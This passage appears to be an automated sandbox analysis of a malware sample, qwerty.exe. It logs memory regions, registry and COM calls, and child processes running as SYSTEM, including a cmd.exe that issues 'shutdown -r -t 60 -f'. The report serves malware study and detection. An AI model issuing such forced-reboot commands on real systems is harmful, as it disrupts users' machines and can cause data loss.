Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 7A0
0x 434
0x 11C
0x 640
0x 424
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x0003ffff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e6fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000000f0000 0x000f0000 0x000f1fff Pagefile Backed Memory Readable, Writable True False False -
wmic.exe.mui 0x00100000 0x0010ffff Memory Mapped File Readable, Writable False False False -
private_0x0000000000110000 0x00110000 0x00110fff Private Memory Readable, Writable True False False -
private_0x0000000000120000 0x00120000 0x00120fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000130000 0x00130000 0x00130fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000140000 0x00140000 0x00140fff Pagefile Backed Memory Readable True False False -
msxml3r.dll 0x00150000 0x00150fff Memory Mapped File Readable False False False -
pagefile_0x0000000000160000 0x00160000 0x00161fff Pagefile Backed Memory Readable True False False -
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False -
private_0x00000000001b0000 0x001b0000 0x001cffff Private Memory - True False False -
windowsshell.manifest 0x001d0000 0x001d0fff Memory Mapped File Readable False False False -
pagefile_0x00000000001d0000 0x001d0000 0x001d0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000001e0000 0x001e0000 0x001e1fff Pagefile Backed Memory Readable True False False -
index.dat 0x001f0000 0x001fbfff Memory Mapped File Readable, Writable True False False -
index.dat 0x00200000 0x00207fff Memory Mapped File Readable, Writable True False False -
index.dat 0x00210000 0x0021ffff Memory Mapped File Readable, Writable True False False -
rsaenh.dll 0x00220000 0x0025bfff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x0022cfff Pagefile Backed Memory Readable, Writable True False False -
wmiutils.dll.mui 0x00220000 0x00224fff Memory Mapped File Readable, Writable False False False -
private_0x0000000000260000 0x00260000 0x0029ffff Private Memory Readable, Writable True False False -
private_0x00000000002a0000 0x002a0000 0x0030ffff Private Memory Readable, Writable True False False -
private_0x0000000000330000 0x00330000 0x0036ffff Private Memory Readable, Writable True False False -
private_0x00000000003c0000 0x003c0000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004fffff Private Memory Readable, Writable True False False -
private_0x0000000000510000 0x00510000 0x0054ffff Private Memory Readable, Writable True False False -
private_0x0000000000560000 0x00560000 0x0065ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000660000 0x00660000 0x007e7fff Pagefile Backed Memory Readable True False False -
private_0x00000000007f0000 0x007f0000 0x008affff Private Memory Readable, Writable True False False -
private_0x0000000000810000 0x00810000 0x0084ffff Private Memory Readable, Writable True False False -
private_0x0000000000870000 0x00870000 0x008affff Private Memory Readable, Writable True False False -
private_0x00000000008d0000 0x008d0000 0x0090ffff Private Memory Readable, Writable True False False -
wmic.exe 0x00930000 0x00992fff Memory Mapped File Readable, Writable, Executable True False False -
pagefile_0x00000000009a0000 0x009a0000 0x00b20fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000b30000 0x00b30000 0x01f2ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001f30000 0x01f30000 0x0211ffff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x020cffff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x0205ffff Private Memory Readable, Writable True False False -
kernelbase.dll.mui 0x01f30000 0x01feffff Memory Mapped File Readable, Writable False False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020e0000 0x020e0000 0x0211ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02120000 0x023eefff Memory Mapped File Readable False False False -
private_0x00000000023f0000 0x023f0000 0x025effff Private Memory Readable, Writable True False False -
private_0x00000000023f0000 0x023f0000 0x024effff Private Memory Readable, Writable True False False -
private_0x00000000025b0000 0x025b0000 0x025effff Private Memory Readable, Writable True False False -
private_0x00000000025f0000 0x025f0000 0x029effff Private Memory Readable, Writable True False False -
private_0x00000000029f0000 0x029f0000 0x02bcffff Private Memory Readable, Writable True False False -
pagefile_0x00000000029f0000 0x029f0000 0x02acefff Pagefile Backed Memory Readable True False False -
private_0x0000000002ae0000 0x02ae0000 0x02b1ffff Private Memory Readable, Writable True False False -
private_0x0000000002b40000 0x02b40000 0x02b7ffff Private Memory Readable, Writable True False False -
private_0x0000000002b90000 0x02b90000 0x02bcffff Private Memory Readable, Writable True False False -
private_0x0000000002c80000 0x02c80000 0x02cbffff Private Memory Readable, Writable True False False -
wmiutils.dll 0x73c50000 0x73c66fff Memory Mapped File Readable, Writable, Executable False False False -
fastprox.dll 0x73cc0000 0x73d55fff Memory Mapped File Readable, Writable, Executable False False False -
msxml3.dll 0x73e60000 0x73f92fff Memory Mapped File Readable, Writable, Executable False False False -
wbemcomn.dll 0x73fa0000 0x73ffbfff Memory Mapped File Readable, Writable, Executable False False False -
ntdsapi.dll 0x74240000 0x74257fff Memory Mapped File Readable, Writable, Executable False False False -
wbemsvc.dll 0x74260000 0x7426efff Memory Mapped File Readable, Writable, Executable False False False -
wbemprox.dll 0x74280000 0x74289fff Memory Mapped File Readable, Writable, Executable False False False -
secur32.dll 0x74290000 0x74297fff Memory Mapped File Readable, Writable, Executable False False False -
wtsapi32.dll 0x742a0000 0x742acfff Memory Mapped File Readable, Writable, Executable False False False -
framedynos.dll 0x742b0000 0x742e4fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrtremote.dll 0x74430000 0x7443dfff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x744c0000 0x7453ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x74780000 0x7491dfff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x74920000 0x7495afff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x74960000 0x74975fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x74a60000 0x74a66fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x74a70000 0x74a8bfff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x74a90000 0x74ad3fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74b10000 0x74b1afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74ee0000 0x74ffcfff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x75170000 0x751c6fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x751d0000 0x75204fff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x75430000 0x75565fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x757b0000 0x757bbfff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x758a0000 0x764e9fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x765a0000 0x7679afff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x767a0000 0x76822fff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x76890000 0x76895fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x76a20000 0x76aaefff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x76b40000 0x76c34fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x7a0
21 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:52:32 (UTC) True 1
Fn
System Get Time type = Ticks, time = 152288 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\wbem\wmic.exe, base_address = 0x930000 True 1
Fn
COM Create interface = DC12A687-737F-11CF-884D-00AA004B2E24, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Module Load module_name = C:\Windows\system32\kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x74cda84f True 1
Fn
System Get Computer Name result_out = YKYD69Q True 1
Fn
System Get Info type = System Directory, result_out = C:\Windows\system32 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging, data = 48 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Logging Directory, data = 37 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\CIMOM, value_name = Log File Max Size, data = 54 True 1
Fn
COM Create interface = 2933BF95-7B36-11D2-B20E-00C04F983E60, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
System Get Time type = Local Time, time = 2018-06-04 08:52:34 (Local Time) True 1
Fn
COM Create interface = EB87E1BC-3233-11D2-AEC9-00C04FB68820, cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Process #9: cmd.exe
57 0
»
Information Value
ID #9
File Name c:\windows\syswow64\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c shutdown -r -t 60 -f
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:43
OS Process Information
»
Information Value
PID 0x66c
Parent PID 0xa44 (c:\users\aetadzjz\appdata\local\temp\qwerty.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 900
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000030000 0x00030000 0x00036fff Pagefile Backed Memory Readable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False -
pagefile_0x00000000000e0000 0x000e0000 0x000e1fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000000f0000 0x000f0000 0x000f0fff Private Memory Readable, Writable True False False -
private_0x0000000000100000 0x00100000 0x00100fff Private Memory Readable, Writable True False False -
private_0x0000000000110000 0x00110000 0x0014ffff Private Memory Readable, Writable True False False -
private_0x00000000001c0000 0x001c0000 0x0023ffff Private Memory Readable, Writable True False False -
private_0x0000000000290000 0x00290000 0x0038ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x004fffff Private Memory Readable, Writable True False False -
private_0x00000000005e0000 0x005e0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001d10000 0x01d10000 0x02052fff Pagefile Backed Memory Readable True False False -
sortdefault.nls 0x02060000 0x0232efff Memory Mapped File Readable False False False -
cmd.exe 0x4a930000 0x4a97bfff Memory Mapped File Readable, Writable, Executable True False False -
winbrand.dll 0x73a90000 0x73a96fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000076cd0000 0x76cd0000 0x76deefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000076df0000 0x76df0000 0x76ee9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x76ef0000 0x77098fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x770d0000 0x7724ffff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Threads
Thread 0x900
57 0
»
Category Operation Information Success Count Logfile
System Get Time type = System Time, time = 2018-06-04 08:52:35 (UTC) True 1
Fn
System Get Time type = Ticks, time = 154862 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\cmd.exe, base_address = 0x4a930000 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetThreadUILanguage, address_out = 0x74cda84f True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System False 1
Fn
File Open filename = STD_OUTPUT_HANDLE True 3
Fn
File Open filename = STD_INPUT_HANDLE True 2
Fn
Environment Get Environment String - True 2
Fn
Data
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor, value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\Microsoft\Command Processor, value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module Get Filename process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Environment Get Environment String name = PROMPT False 1
Fn
Environment Set Environment String name = PROMPT, value = $P$G True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Environment Get Environment String name = KEYS False 1
Fn
File Get Info filename = C:\Users\aETAdzjz\Desktop, type = file_attributes True 2
Fn
Environment Set Environment String name = =C:, value = C:\Users\aETAdzjz\Desktop True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Module Get Handle module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x74cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x74ce3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsDebuggerPresent, address_out = 0x74cc4a5d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetConsoleInputExeNameW, address_out = 0x74cda79d True 1
Fn
Environment Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Environment Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Process Create process_name = C:\Windows\system32\shutdown.exe, os_pid = 0x8d8, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Environment Set Environment String name = COPYCMD True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCode, value = 00000000 True 1
Fn
Environment Get Environment String - True 1
Fn
Data
Environment Set Environment String name = =ExitCodeAscii True 1
Fn
Environment Get Environment String - True 1
Fn
Data
File Open filename = STD_OUTPUT_HANDLE True 2
Fn
File Open filename = STD_INPUT_HANDLE True 1
Fn
Process #10: shutdown.exe
0 0
»
Information Value
ID #10
File Name c:\windows\syswow64\shutdown.exe
Command Line shutdown -r -t 60 -f
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:01:37, Reason: Child Process
Unmonitor End Time: 00:05:20, Reason: Terminated by Timeout
Monitor Duration 00:03:43
Remarks No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x8d8
Parent PID 0x66c (c:\windows\syswow64\cmd.exe)
Is Created or Modified Executable False
Integrity Level System (Elevated)
Username NT AUTHORITY\SYSTEM
Enabled Privileges SeLockMemoryPrivilege, SeTcbPrivilege, SeSystemProfilePrivilege, SeProfileSingleProcessPrivilege, SeIncreaseBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege
Thread IDs
0x 8CC
0x 8B0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000000020000 0x00020000 0x0002ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False -
private_0x0000000000070000 0x00070000 0x000affff Private Memory Readable, Writable True False False -
locale.nls 0x000b0000 0x00116fff Memory Mapped File Readable False False False -
shutdown.exe 0x00180000 0x00189fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000001d0000 0x001d0000 0x0020ffff Private Memory Readable, Writable True False False -
private_0x0000000000370000 0x00370000 0x0037ffff Private Memory Readable, Writable True False False -
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable True False False -
private_0x0000000000670000 0x00670000 0x0076ffff Private Memory Readable, Writable True False False -
secur32.dll 0x74290000 0x74297fff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74550000 0x74557fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74560000 0x745bbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x745c0000 0x745fefff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x74c20000 0x74c2bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x74c30000 0x74c8ffff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74cb0000 0x74dbffff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74dc0000 0x74eaffff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x75000000 0x750cbfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x750d0000 0x7516ffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x75570000 0x7566ffff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75670000 0x756fffff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75750000 0x757affff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757c0000 0x7585cfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x764f0000 0x7659bfff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76830000 0x76839fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x76840000 0x76885fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x768a0000 0x768b8fff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x768c0000 0x76a1bfff Memory Mapped File Readable, Writable, Executable False False False -
